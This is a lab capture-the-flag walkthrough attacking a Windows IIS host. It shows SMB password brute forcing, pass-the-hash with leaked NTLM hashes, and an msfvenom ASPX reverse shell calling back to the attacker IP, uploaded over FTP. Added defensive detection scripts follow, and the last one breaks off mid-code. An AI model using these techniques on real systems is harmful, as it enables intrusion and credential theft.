Host & Network Penetration Testing: Exploitation CTF 2 Walkthrough
This walkthrough covers a comprehensive penetration testing exercise demonstrating various exploitation techniques commonly encountered in real-world scenarios and eJPT certification preparation. We’ll explore SMB enumeration, password attacks, hash-based authentication, and web shell deployment in a systematic approach.
Overview
Target: target.ine.local (10.2.27.100)
Attacker: 10.10.49.6
Objectives: Exploit vulnerable services and retrieve 4 flags
Key Skills: SMB exploitation, password attacks, FTP enumeration, web shell deployment
Initial Reconnaissance
We’ll start with comprehensive reconnaissance to understand our target’s attack surface and identify potential entry points.
Step 1: Target Identification
First, let’s identify our target from the hosts file to confirm we’re attacking the correct system:
cat /etc/hosts
Hosts File Content:
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.1.0.12 INE
127.0.0.1 AttackDefense-Kali
10.10.49.6 INE
10.2.27.100 target.ine.local
This reveals our target at 10.2.27.100 with hostname target.ine.local. Having the hostname is useful, as some services behave differently when accessed via hostname versus IP address.
Step 2: Port Scanning and Service Discovery
Starting with our standard nmap reconnaissance to identify open ports and services. This comprehensive scan helps us understand what services are running and their versions, which is crucial for vulnerability assessment:
nmap -sV -sC -p- 10.2.27.100 -oX scanResult.txt
Nmap Results:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-28 17:30 IST
Nmap scan report for target.ine.local (10.2.27.100)
Host is up (0.0031s latency).
Not shown: 65523 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2025-09-28T12:01:38+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=WIN-M878Q9NE9S6
| Not valid before: 2025-09-27T11:53:49
|_Not valid after: 2026-03-29T11:53:49
| rdp-ntlm-info:
| Target_Name: WIN-M878Q9NE9S6
| NetBIOS_Domain_Name: WIN-M878Q9NE9S6
| NetBIOS_Computer_Name: WIN-M878Q9NE9S6
| DNS_Domain_Name: WIN-M878Q9NE9S6
| DNS_Computer_Name: WIN-M878Q9NE9S6
| Product_Version: 6.3.9600
|_ System_Time: 2025-09-28T12:01:30+00:00
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
49210/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-09-28T12:01:31
|_ start_date: 2025-09-28T11:53:47
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled but not required
Key Findings:
- Port 21: Microsoft FTP Server (Windows_NT)
- Port 80: Microsoft IIS httpd 8.5
- Port 135: Microsoft Windows RPC
- Port 139: NetBIOS Session Service
- Port 445: Microsoft SMB
- Port 3389: SSL/RDP (Certificate: WIN-M878Q9NE9S6)
- Multiple high ports: Various Microsoft RPC services
The scan reveals a Windows Server environment running IIS 8.5, which suggests Windows Server 2012 R2. The presence of SMB, FTP, and RDP services provides multiple potential attack vectors.
Step 3: Operating System Fingerprinting
Let’s attempt more detailed OS detection to better understand our target:
nmap -sV -O 10.2.27.100 -oX scanResultOS.txt
OS Detection Results:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-28 17:33 IST
Nmap scan report for target.ine.local (10.2.27.100)
Host is up (0.0025s latency).
Not shown: 990 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
80/tcp open http Microsoft IIS httpd 8.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ssl/ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
While no exact OS match was found, the service versions and behavior patterns confirm this is a Windows Server system, likely Server 2012 R2 based on the IIS 8.5 version.
Step 4: FTP Anonymous Access Testing
Since FTP is running, let’s check if anonymous access is permitted. This is a common misconfiguration that can provide easy initial access:
nmap -sV -p 21 --script=ftp-anon 10.2.27.100
FTP Anonymous Test Results:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-28 17:38 IST
Nmap scan report for target.ine.local (10.2.27.100)
Host is up (0.0027s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Let’s try manual anonymous access:
ftp 10.2.27.100 21
FTP Login Results:
Connected to 10.2.27.100.
220 Microsoft FTP Service
Name (10.2.27.100:root): Anonymous
331 Password required
Password:
530 User cannot log in.
ftp: Login failed
ftp> exit
221 Goodbye.
Anonymous FTP access is properly disabled, so we’ll need valid credentials to access this service.
Challenge 1: SMB User Enumeration and Password Attack
Objective
“Looks like smb user tom has not changed his password from a very long time.”
The challenge hint suggests user “tom” has a weak password. Since SMB is running on port 445, this becomes our primary attack vector.
Step 1: SMB Brute Force Attack Setup
We’ll use Metasploit’s SMB login scanner for an efficient dictionary attack. This module is particularly effective because it can handle Windows authentication properly and create sessions for further exploitation:
msfconsole
search smb_login
use auxiliary/scanner/smb/smb_login
Metasploit Search Results:
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/smb/smb_login . normal No SMB Login Check Scanner
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smb/smb_login
Step 2: Module Configuration
Let’s configure the scanner with appropriate parameters. The unix_passwords.txt wordlist is effective against weak passwords that haven’t been changed in a long time:
show options
set RHOSTS 10.2.27.100
set SMBUser tom
set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
set CreateSession true
run
Module Options:
Module options (auxiliary/scanner/smb/smb_login):
Name Current Setting Required Description
---- --------------- -------- -----------
ABORT_ON_LOCKOUT false yes Abort the run when an account lockout is detected
ANONYMOUS_LOGIN false yes Attempt to login with a blank username and password
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
CreateSession false no Create a new session for every successful login
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
RHOSTS yes The target host(s)
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
Brute Force Attack Results:
[-] 10.2.27.100:445 - 10.2.27.100:445 - Failed: '.\tom:michelle1'
[-] 10.2.27.100:445 - 10.2.27.100:445 - Failed: '.\tom:maddie'
[-] 10.2.27.100:445 - 10.2.27.100:445 - Failed: '.\tom:angie'
[-] 10.2.27.100:445 - 10.2.27.100:445 - Failed: '.\tom:cinderella'
[-] 10.2.27.100:445 - 10.2.27.100:445 - Failed: '.\tom:jesuschrist'
[-] 10.2.27.100:445 - 10.2.27.100:445 - Failed: '.\tom:lester'
[... many failed attempts ...]
[-] 10.2.27.100:445 - 10.2.27.100:445 - Failed: '.\tom:happy1'
[+] 10.2.27.100:445 - 10.2.27.100:445 - Success: '.\tom:felipe'
[*] 10.2.27.100:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.2.27.100:445 - Bruteforce completed, 1 credential was successful.
[*] 10.2.27.100:445 - You can open an SMB session with these credentials and CreateSession set to true
Success! The scanner discovers that user tom has password felipe. This confirms the weak password assumption from the challenge hint.
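From the defender's side, the long run of failures followed by a single success shown above is exactly the pattern a SIEM rule should catch, and it is the "monitor for failed authentication attempts" item from the lessons at the end of this writeup made concrete. The Python script below is an added example, not part of the original walkthrough and not Metasploit's code: it runs that detection over constructed log lines modelled on Windows Security events 4625 (failed logon) and 4624 (successful logon) restricted to network logons (LogonType 3, which is what SMB authentication produces). The one-line field layout, the source addresses, the five-failures-in-sixty-seconds threshold and the user names are assumptions made for the example.

```python
"""Added example: flag password-guessing bursts against SMB from Windows logon events.

Each constructed line mimics the fields of a Windows Security event:
4625 = failed logon, 4624 = successful logon, LogonType 3 = network (SMB).
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log (assumed field layout; not real captured events).
# 10.0.0.7 fails three times but minutes apart, 10.10.49.6 produces a burst and then succeeds.
SAMPLE_LOG = """\
2025-09-28T19:00:00 EventID=4625 TargetUser=alice IpAddress=10.0.0.7 LogonType=3
2025-09-28T19:05:00 EventID=4625 TargetUser=alice IpAddress=10.0.0.7 LogonType=3
2025-09-28T19:09:00 EventID=4625 TargetUser=alice IpAddress=10.0.0.7 LogonType=3
2025-09-28T19:10:01 EventID=4625 TargetUser=tom IpAddress=10.10.49.6 LogonType=3
2025-09-28T19:10:02 EventID=4625 TargetUser=tom IpAddress=10.10.49.6 LogonType=3
2025-09-28T19:10:03 EventID=4625 TargetUser=tom IpAddress=10.10.49.6 LogonType=3
2025-09-28T19:10:04 EventID=4625 TargetUser=tom IpAddress=10.10.49.6 LogonType=3
2025-09-28T19:10:05 EventID=4625 TargetUser=tom IpAddress=10.10.49.6 LogonType=3
2025-09-28T19:10:06 EventID=4625 TargetUser=tom IpAddress=10.10.49.6 LogonType=3
2025-09-28T19:10:07 EventID=4625 TargetUser=tom IpAddress=10.10.49.6 LogonType=3
2025-09-28T19:10:09 EventID=4624 TargetUser=tom IpAddress=10.10.49.6 LogonType=3
2025-09-28T19:11:00 EventID=4625 TargetUser=bob IpAddress=10.0.0.5 LogonType=3
"""

EVENT_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<id>\d+) TargetUser=(?P<user>\S+) "
    r"IpAddress=(?P<ip>\S+) LogonType=(?P<lt>\d+)$"
)


def parse_event(line):
    """Parse one constructed log line; return None for lines that do not match."""
    m = EVENT_RE.match(line.strip())
    if m is None:
        return None
    return {
        "ts": datetime.fromisoformat(m["ts"]),
        "id": int(m["id"]),
        "user": m["user"],
        "ip": m["ip"],
        "logon_type": int(m["lt"]),
    }


def detect_guessing(lines, threshold=5, window=timedelta(seconds=60)):
    """Return one alert per source IP that produced >= threshold network-logon
    failures inside a sliding window. A later success from the same source is
    recorded on the alert; that "guessed it" combination is the one worth paging on."""
    recent = defaultdict(deque)   # ip -> deque of (timestamp, user) failures still in window
    open_alerts = {}              # ip -> alert dict already raised for that source
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev is None or ev["logon_type"] != 3:
            continue
        q = recent[ev["ip"]]
        while q and ev["ts"] - q[0][0] > window:   # expire failures older than the window
            q.popleft()
        if ev["id"] == 4625:
            q.append((ev["ts"], ev["user"]))
            alert = open_alerts.get(ev["ip"])
            if alert is not None:
                alert["failures"] += 1
                alert["users"].add(ev["user"])
            elif len(q) >= threshold:
                alert = {
                    "ip": ev["ip"],
                    "first_seen": q[0][0],
                    "failures": len(q),
                    "users": {u for _, u in q},
                    "success_as": None,
                }
                open_alerts[ev["ip"]] = alert
                alerts.append(alert)
        elif ev["id"] == 4624:
            alert = open_alerts.get(ev["ip"])
            if alert is not None and alert["success_as"] is None:
                alert["success_as"] = ev["user"]
    return alerts


if __name__ == "__main__":
    for a in detect_guessing(SAMPLE_LOG.splitlines()):
        print(f"{a['ip']}: {a['failures']} failures against {sorted(a['users'])}, "
              f"first seen {a['first_seen']:%H:%M:%S}, succeeded as {a['success_as']}")
```

The sliding window is what keeps the three spaced-out failures from 10.0.0.7 quiet while the burst from 10.10.49.6 trips the rule on its fifth attempt; the success that follows is attached to the same alert rather than raising a second one. In a real deployment the same logic would also be fed the Metasploit-visible signal on the target side, the BRUTEFORCE_SPEED and THREADS options an attacker can tune, which is why a lockout policy (the module's ABORT_ON_LOCKOUT option exists precisely because lockouts are common) is the complementary control.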
Step 3: SMB Share Enumeration
Now that we have valid credentials, let’s enumerate the available SMB shares to understand what data we can access:
smbclient -L 10.2.27.100 -U tom
SMB Share Enumeration Results:
Password for [WORKGROUP\tom]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
D$ Disk Default share
HRDocuments Disk
IPC$ IPC Remote IPC
ITResources Disk
print$ Disk Printer Drivers
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.2.27.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Available Shares:
- ADMIN$ (Remote Admin) - Administrative share
- C$ (Default share) - C drive access
- D$ (Default share) - D drive access
- HRDocuments - Custom department share
- IPC$ (Remote IPC) - Inter-process communication
- ITResources - Custom IT department share
- print$ (Printer Drivers) - Print services
The custom shares HRDocuments and ITResources are particularly interesting, as they likely contain sensitive organizational data.
Step 4: Accessing HRDocuments Share
Let’s use our Metasploit SMB session to access the shares systematically:
sessions -i 1
shares
shares -i 3 # Connect to HRDocuments
ls
Session Management:
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 smb SMB tom @ 10.2.27.100:445 10.10.49.6:45959 -> 10.2.27.100:445 (10.2.27.100)
Share Access Results:
SMB (10.2.27.100) > shares
Shares
======
# Name Type comment
- ---- ---- -------
0 ADMIN$ DISK|SPECIAL Remote Admin
1 C$ DISK|SPECIAL Default share
2 D$ DISK|SPECIAL Default share
3 HRDocuments DISK
4 IPC$ IPC|SPECIAL Remote IPC
5 ITResources DISK
6 print$ DISK Printer Drivers
SMB (10.2.27.100) > shares -i 3
[+] Successfully connected to HRDocuments
SMB (10.2.27.100\HRDocuments) > ls
ls
===
# Type Name Created Accessed Written Changed Size
- ---- ---- ------- -------- ------- ------- ----
0 DIR . 2024-06-13T14:10:49+05:30 2024-06-14T11:36:28+05:30 2025-09-28T17:23:52+05:30 2025-09-28T17:23:52+05:30
1 DIR .. 2024-06-13T14:10:49+05:30 2024-06-14T11:36:28+05:30 2025-09-28T17:23:52+05:30 2025-09-28T17:23:52+05:30
2 FILE flag1.txt 2025-09-28T17:23:52+05:30 2025-09-28T17:23:52+05:30 2025-09-28T17:23:52+05:30 2025-09-28T17:23:52+05:30 34
3 FILE leaked-hashes.txt 2024-06-13T14:32:47+05:30 2024-06-14T11:35:14+05:30 2024-06-14T11:35:55+05:30 2024-06-14T11:35:55+05:30 6665
Files Discovered:
- flag1.txt - Our target flag
- leaked-hashes.txt - Potentially containing credential hashes
This is exactly what we need! The leaked hashes file suggests there may be additional users we can compromise.
Step 5: File Retrieval
download flag1.txt
download leaked-hashes.txt
File Download Results:
SMB (10.2.27.100\HRDocuments) > download flag1.txt
[*] Downloaded 34.00 B of 34.00 B (100.0%)
[+] Downloaded flag1.txt to flag1.txt
SMB (10.2.27.100\HRDocuments) > download leaked-hashes.txt
[*] Downloaded 6.51 KiB of 6.51 KiB (100.0%)
[+] Downloaded leaked-hashes.txt to leaked-hashes.txt
Reading the flag file:
cat flag1.txt
Flag 1 Content:
7709e0d8e268405599af1eb0ea8bf304
🚩 Flag 1: 7709e0d8e268405599af1eb0ea8bf304
Challenge 2: NTLM Hash Attack
Objective
“Using the NTLM hash list discovered in the previous challenge, can you compromise the smb user nancy?”
The leaked hashes file provides us with NTLM hashes that we can use for pass-the-hash attacks, a powerful technique in Windows environments.
Step 1: Hash Analysis
Let’s examine the contents of the leaked hashes file:
cat leaked-hashes.txt
Leaked Hashes Content:
aad3b435b51404eeaad3b435b51404ee:a3dwea4b4v957f2e037rf75cfe5218ed
aad3b435b51404eeaad3b435b51404ee:33f0bc3a5ea6ea0a0eb8d81e8a3c18e0
aad3b435b51404eeaad3b435b51404ee:2b6fb4dca01db3065f8ef2a654aeaf14
aad3b435b51404eeaad3b435b51404ee:8f06e3a0fda656e3f7c5b35b7e332e98
aad3b435b51404eeaad3b435b51404ee:b5ae529619b206bf3e4b45e8a22c40da
aad3b435b51404eeaad3b435b51404ee:46c197f775b07056337e85f8378244f5
aad3b435b51404eeaad3b435b51404ee:24c3d6a1da5d70f88a3f91faad0e6a75
[... many more hashes ...]
aad3b435b51404eeaad3b435b51404ee:b3ddea4b4b957f3e037af75cfe5317ad
aad3b435b51404eeaad3b435b51404ee:3e7a00edf97e91a9bbd85e6ef9bdfb8e
aad3b435b51404eeaad3b435b51404ee:7e7fcf33d3aa541fe76b05e47f6873d8
[... continues for 80+ hashes ...]
The file contains NTLM hashes in the format:
aad3b435b51404eeaad3b435b51404ee:actual_ntlm_hash
The first part (aad3b435b51404eeaad3b435b51404ee) is the LM hash of an empty string, the value modern Windows stores in the LM field because LM hashing is disabled by default; the second part is the account's actual NTLM (NT) hash.
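A defender who recovers a file like this wants to know what it exposes before anyone else does. The Python script below is an added example, not part of the original walkthrough: a validator for hash-dump lines in the LM:NT layout shown above (it also accepts the pwdump-style user:rid:LM:NT::: layout) that rejects entries that are not 32 hex characters (the first line of the leaked file above is one, it contains the letters w, v and r), lists accounts that still store a real LM hash, accounts whose NT hash is the empty-string hash (a blank password), and NT hashes shared by several entries, which means the same password is in use on more than one account. The first four sample lines are values from the page; the account names, RIDs, the non-placeholder LM value and the junk line are constructed for the example.

```python
"""Added example: audit a leaked LM:NT hash list for what it reveals."""
import re
from collections import Counter

EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty string: LM storage disabled
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty string: blank password
HEX32 = re.compile(r"^[0-9a-f]{32}$")

# Constructed sample: the first four lines are values from the leaked file above;
# the pwdump-style lines (user:rid:LM:NT:::) and the last line are made up.
SAMPLE_DUMP = """\
aad3b435b51404eeaad3b435b51404ee:a3dwea4b4v957f2e037rf75cfe5218ed
aad3b435b51404eeaad3b435b51404ee:33f0bc3a5ea6ea0a0eb8d81e8a3c18e0
aad3b435b51404eeaad3b435b51404ee:2b6fb4dca01db3065f8ef2a654aeaf14
aad3b435b51404eeaad3b435b51404ee:b3ddea4b4b957f3e037af75cfe5317ad
svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:b3ddea4b4b957f3e037af75cfe5317ad:::
legacy_app:1106:e52cac67419a9a224a3b108f3fa6cb6d:33f0bc3a5ea6ea0a0eb8d81e8a3c18e0:::
guest_kiosk:1107:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
not a hash line
"""


def parse_hash_line(line):
    """Accept 'LM:NT' or 'user:rid:LM:NT:::'; raise ValueError on anything else."""
    parts = line.strip().lower().split(":")
    if len(parts) == 2:
        user, lm, nt = None, parts[0], parts[1]
    elif len(parts) >= 4:
        user, lm, nt = parts[0], parts[2], parts[3]
    else:
        raise ValueError(f"unrecognised layout: {line.strip()!r}")
    for label, value in (("LM", lm), ("NT", nt)):
        if not HEX32.match(value):
            raise ValueError(f"{label} hash is not 32 hex characters: {value!r}")
    return {
        "user": user,
        "lm": lm,
        "nt": nt,
        "lm_empty": lm == EMPTY_LM_HASH,
        "nt_empty": nt == EMPTY_NT_HASH,
    }


def audit_hash_file(text):
    """Summarise a hash dump: parse failures, LM hashes still stored,
    blank passwords, and NT hashes shared by more than one entry."""
    entries, invalid = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        if not raw.strip():
            continue
        try:
            entries.append(parse_hash_line(raw))
        except ValueError as exc:
            invalid.append((lineno, str(exc)))
    nt_counts = Counter(e["nt"] for e in entries)
    return {
        "valid": len(entries),
        "invalid": invalid,
        "lm_present": [e for e in entries if not e["lm_empty"]],
        "blank_passwords": [e for e in entries if e["nt_empty"]],
        "shared_nt": {h: n for h, n in nt_counts.items() if n > 1},
    }


if __name__ == "__main__":
    report = audit_hash_file(SAMPLE_DUMP)
    print(f"{report['valid']} valid entries, {len(report['invalid'])} rejected")
    for lineno, why in report["invalid"]:
        print(f"  line {lineno}: {why}")
    print("LM hash still stored:", [e["user"] for e in report["lm_present"]])
    print("blank NT hash:", [e["user"] for e in report["blank_passwords"]])
    print("NT hashes shared by several accounts:", report["shared_nt"])
```

Two of the findings matter beyond this lab: an NT hash that appears under more than one account means one password reset is not enough, and any account still carrying a non-placeholder LM hash has a password that is far weaker than its NT hash suggests and should be rotated on a system with LM storage disabled.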
Step 2: Hash Extraction
For easier processing, let’s extract just the NTLM portions:
cut -d':' -f2 leaked-hashes.txt > ntlm-hashes.txt
However, for pass-the-hash attacks, we need the full format, so we’ll use the original file directly.
Step 3: Pass-the-Hash Attack
Pass-the-hash attacks allow us to authenticate using the hash directly without knowing the plaintext password. This is possible because Windows NTLM authentication can work with just the hash:
use auxiliary/scanner/smb/smb_login
set SMBUser nancy
set PASS_FILE leaked-hashes.txt
set RHOSTS 10.2.27.100
set CreateSession true
run
Pass-the-Hash Attack Results:
[*] 10.2.27.100:445 - 10.2.27.100:445 - Starting SMB login bruteforce
[-] 10.2.27.100:445 - 10.2.27.100:445 - Failed: '.\nancy:aad3b435b51404eeaad3b435b51404ee:a3dwea4b4v957f2e037rf75cfe5218ed'
[-] 10.2.27.100:445 - 10.2.27.100:445 - Failed: '.\nancy:aad3b435b51404eeaad3b435b51404ee:33f0bc3a5ea6ea0a0eb8d81e8a3c18e0'
[... several failed attempts ...]
[-] 10.2.27.100:445 - 10.2.27.100:445 - Failed: '.\nancy:aad3b435b51404eeaad3b435b51404ee:34ec1e4f6f7cbe35a09ee51b1c0039d2'
[+] 10.2.27.100:445 - 10.2.27.100:445 - Success: '.\nancy:aad3b435b51404eeaad3b435b51404ee:b3ddea4b4b957f3e037af75cfe5317ad'
[*] SMB session 3 opened (10.10.49.6:43419 -> 10.2.27.100:445) at 2025-09-28 19:34:03 +0530
[*] 10.2.27.100:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.2.27.100:445 - Bruteforce completed, 1 credential was successful.
[*] 10.2.27.100:445 - 1 SMB session was opened successfully.
Success! User nancy authenticates with the hash b3ddea4b4b957f3e037af75cfe5317ad. This demonstrates how leaked password hashes can be used directly without needing to crack them first.
Step 4: Accessing ITResources Share
With nancy’s access, let’s explore what additional resources we can access:
sessions -i 3
shares
shares -i 5 # Connect to ITResources
ls
ITResources Share Access:
SMB (10.2.27.100) > shares
Shares
======
# Name Type comment
- ---- ---- -------
0 ADMIN$ DISK|SPECIAL Remote Admin
1 C$ DISK|SPECIAL Default share
2 D$ DISK|SPECIAL Default share
3 HRDocuments DISK
4 IPC$ IPC|SPECIAL Remote IPC
5 ITResources DISK
6 print$ DISK Printer Drivers
SMB (10.2.27.100) > shares -i 5
[+] Successfully connected to ITResources
SMB (10.2.27.100\ITResources) > ls
ls
===
# Type Name Created Accessed Written Changed Size
- ---- ---- ------- -------- ------- ------- ----
0 DIR . 2024-06-13T14:11:07+05:30 2025-09-28T18:51:37+05:30 2025-09-28T18:51:37+05:30 2025-09-28T18:51:37+05:30
1 DIR .. 2024-06-13T14:11:07+05:30 2025-09-28T18:51:37+05:30 2025-09-28T18:51:37+05:30 2025-09-28T18:51:37+05:30
2 FILE flag2.txt 2025-09-28T18:51:37+05:30 2025-09-28T18:51:37+05:30 2025-09-28T18:51:37+05:30 2025-09-28T18:51:37+05:30 34
3 FILE hint.txt 2024-06-13T14:45:39+05:30 2024-06-13T14:45:39+05:30 2024-06-13T16:00:47+05:30 2024-06-13T16:00:47+05:30 71
Files Found:
- flag2.txt - Our second target flag
- hint.txt - Likely contains useful information for next steps
Step 5: File Retrieval and Analysis
download flag2.txt
download hint.txt
File Download Results:
SMB (10.2.27.100\ITResources) > download flag2.txt
[*] Downloaded 34.00 B of 34.00 B (100.0%)
[+] Downloaded flag2.txt to flag2.txt
SMB (10.2.27.100\ITResources) > download hint.txt
[*] Downloaded 71.00 B of 71.00 B (100.0%)
[+] Downloaded hint.txt to hint.txt
cat flag2.txt
Flag 2 Content:
1dd400033942437c983d4ca85c044828
🚩 Flag 2: 1dd400033942437c983d4ca85c044828
cat hint.txt
Hint File Content:
Who knows, these creds might come handy! ---> david:omnitrix_9901
This provides us with credentials for user david, which will be useful for our next challenge.
Challenge 3: FTP Service Exploitation
Objective
“I wonder what the hint found in the previous challenge be useful for!”
The hint file provided credentials for user david. Since we discovered FTP running on port 21 during our initial reconnaissance, let's try these credentials there.
Step 1: FTP Authentication
Using the credentials discovered in the hint file:
ftp target.ine.local
# Username: david
# Password: omnitrix_9901
FTP Authentication Results:
Connected to target.ine.local.
220 Microsoft FTP Service
Name (target.ine.local:root): david
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>
Success! FTP access granted. This shows how information gathered from one service can be leveraged to access other services.
Step 2: FTP Directory Enumeration
Now let’s explore what’s available in the FTP directory:
ftp> ls
FTP Directory Listing:
ftp> ls
229 Entering Extended Passive Mode (|||49460|)
125 Data connection already open; Transfer starting.
06-13-24 10:36AM <DIR> aspnet_client
09-28-25 01:21PM 34 flag3.txt
06-13-24 10:34AM 99710 iis-85.png
06-13-24 10:34AM 701 iisstart.htm
226 Transfer complete.
Directory Contents:
- aspnet_client (directory) - ASP.NET client files
- flag3.txt - Our target flag
- iis-85.png - IIS logo image
- iisstart.htm - Default IIS start page
This directory structure is very telling: it appears we have FTP access to the web root directory of the IIS server. The presence of iisstart.htm and the aspnet_client directory confirms this is the web server's document root.
Step 3: Flag Retrieval
ftp> get flag3.txt
Flag 3 Retrieval:
ftp> get flag3.txt
local: flag3.txt remote: flag3.txt
229 Entering Extended Passive Mode (|||49463|)
150 Opening ASCII mode data connection.
100% |******************************************************************| 34 13.13 KiB/s 00:00 ETA
226 Transfer complete.
34 bytes received in 00:00 (11.92 KiB/s)
cat flag3.txt
Flag 3 Content:
dd04520d2c574e98ac278f232b340783
🚩 Flag 3: dd04520d2c574e98ac278f232b340783
Step 4: Strategic Analysis
Having FTP write access to the web root directory is a significant security vulnerability. This means we can upload files that will be accessible via the web server, potentially including malicious code that could give us remote code execution.
Challenge 4: Web Shell Upload and System Compromise
Objective
“Can you compromise the target machine and retrieve the C://flag4.txt file?”
With FTP write access to the web root and IIS running ASP.NET, we can upload a web shell to achieve remote code execution.
Step 1: Payload Generation
Since this is an IIS server supporting ASP.NET, we’ll create an ASP reverse shell using msfvenom:
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.49.6 LPORT=1234 -f asp > shell.aspx
Payload Generation Results:
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of asp file: 38244 bytes
This creates a reverse shell payload in ASP format that will connect back to our machine when executed by the web server.
Step 2: Payload Upload via FTP
Upload our malicious payload to the web root:
ftp> put shell.aspx
Payload Upload Results:
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
229 Entering Extended Passive Mode (|||49489|)
125 Data connection already open; Transfer starting.
100% |******************************************************************| 38244 8.21 MiB/s --:-- ETA
226 Transfer complete.
38244 bytes sent in 00:00 (5.50 MiB/s)
The file is now accessible via the web server at http://target.ine.local/shell.aspx.
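The Strategic Analysis in Challenge 3 and this upload point to the same control on the defender's side: if a web root is also an FTP-writable directory, the operator needs to know within minutes when a new server-side script file appears in it, and the FTP listing from Challenge 3 is small enough that a hash baseline of every file is cheap. The Python script below is an added example, not code from the walkthrough or from IIS, that hashes a baseline of the web root and diffs a later snapshot against it, reporting added, removed and modified files and flagging any new or changed file whose extension the web server would execute. It builds a throwaway directory modelled on the FTP listing above (aspnet_client, iisstart.htm, iis-85.png), then writes an inert text placeholder named shell.aspx into it to stand in for the upload and appends to iisstart.htm to stand in for a defacement; the extension list, the file contents and the paths are assumptions for the example.

```python
"""Added example: baseline a web root and flag unexpected script files."""
import hashlib
import tempfile
from pathlib import Path

# Server-side extensions IIS (or another web server) would execute rather than serve as-is.
SCRIPT_EXTENSIONS = {".asp", ".aspx", ".ashx", ".asmx", ".php", ".jsp", ".cgi"}


def hash_tree(root):
    """Map every file under root (relative POSIX path) to its SHA-256 digest."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def diff_manifests(baseline, current):
    """Compare two manifests; 'suspicious' is any added or modified script file."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(k for k in baseline.keys() & current.keys() if baseline[k] != current[k])
    suspicious = sorted(k for k in added + modified if Path(k).suffix.lower() in SCRIPT_EXTENSIONS)
    return {"added": added, "removed": removed, "modified": modified, "suspicious": suspicious}


def build_demo_webroot(base):
    """Create a constructed web root modelled on the FTP listing, take the baseline,
    then simulate what an FTP user with write access could do to it."""
    root = Path(base)
    (root / "aspnet_client").mkdir(parents=True, exist_ok=True)
    (root / "aspnet_client" / "placeholder.txt").write_text("constructed client file\n")
    (root / "iisstart.htm").write_text("<html><body>IIS Windows Server</body></html>\n")
    (root / "iis-85.png").write_bytes(b"\x89PNG\r\n\x1a\n")  # constructed stub, not a real image
    baseline = hash_tree(root)
    # After the baseline: a new file with a script extension (inert placeholder text
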